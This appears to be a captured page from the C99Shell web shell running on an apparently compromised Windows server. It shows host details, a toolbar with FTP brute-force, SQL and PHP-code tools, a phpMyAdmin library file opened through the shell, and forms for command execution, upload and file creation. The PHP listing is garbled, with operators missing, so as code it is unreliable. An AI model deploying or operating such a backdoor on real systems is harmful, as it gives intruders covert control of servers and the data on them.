!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpmyadmin\libraries\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_table_exists.lib.php (2.03 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: db_table_exists.lib.php,v 2.9 2005/11/15 11:14:17 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Ensure the database and the table exist (else move to the "parent" script)
 * and display headers
 */
if (!isset($is_db) || !$is_db) {
    
// Not a valid db name -> back to the welcome page
    
if (!empty($db)) {
        
$is_db = @PMA_DBI_select_db($db);
    }
    if (empty(
$db) || !$is_db) {
        if (!
defined('IS_TRANSFORMATION_WRAPPER')) {
            
PMA_sendHeaderLocation($cfg['PmaAbsoluteUri'] . 'main.php?' PMA_generate_common_url('''''&') . (isset($message) ? '&message=' urlencode($message) : '') . '&reload=1');
        }
        exit;
    }
// end if (ensures db exists)
if (!isset($is_table) || !$is_table) {
    
// Not a valid table name -> back to the db_details.php
    
if (!empty($table)) {
        
$is_table PMA_DBI_try_query('SHOW TABLES LIKE \'' PMA_sqlAddslashes($tableTRUE) . '\';'NULLPMA_DBI_QUERY_STORE);
    }
    if (empty(
$table)
        || !(
$is_table && @PMA_DBI_num_rows($is_table))) {
        
$redirect TRUE;
        if (!
defined('IS_TRANSFORMATION_WRAPPER')) {
            
$redirect TRUE;
            if (!empty(
$table)) {
                
PMA_DBI_free_result($is_table);
                
// SHOW TABLES doesn't show temporary tables, so try select (as it can happen just in case temporary table, it should be fast):
                
$is_table2 PMA_DBI_try_query('SELECT COUNT(*) FROM `' PMA_sqlAddslashes($tableTRUE) . '`;'NULLPMA_DBI_QUERY_STORE);
                
$redirect = !($is_table2 && @PMA_DBI_num_rows($is_table2));
                
PMA_DBI_free_result($is_table2);
            }

            if (
$redirect) {
                
PMA_sendHeaderLocation($cfg['PmaAbsoluteUri'] . 'db_details.php?' PMA_generate_common_url($db'''&') . (isset($message) ? '&message=' urlencode($message) : '') . '&reload=1');
            }
        }
        if (
$redirect) exit;
    } else if (isset(
$is_table)) {
        
PMA_DBI_free_result($is_table);
    }
// end if (ensures table exists)
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--